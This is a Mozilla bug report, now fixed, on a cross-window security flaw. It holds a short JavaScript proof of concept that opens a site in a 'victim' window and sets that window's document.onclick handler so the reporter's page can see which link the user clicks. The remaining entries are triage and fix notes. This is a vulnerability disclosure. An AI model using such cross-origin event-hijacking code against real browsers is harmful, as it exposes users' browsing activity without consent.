Closed
Bug 24152
Opened 25 years ago
Closed 25 years ago
document.onclick shows links from other window
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M14
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
It is possible to change the document.onclick event handler and this allows seeing the link on which the user has clicked. The code is: ------------------------------------------------ <SCRIPT> function ev(event) { alert("You clicked on: "+event.target.data); } a=window.open("http://www.yahoo.com","victim"); setTimeout("a.document.onclick = ev;",5000); </SCRIPT> ------------------------------------------------
Assignee | ||
Updated•25 years ago
|
Status: NEW → ASSIGNED
Target Milestone: M14
Assignee | ||
Comment 1•25 years ago
|
||
Fixed: DOM prop eventtarget.addeventlistener now controls access to this event handler.
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in
before you can comment on or make changes to this bug.
Description
•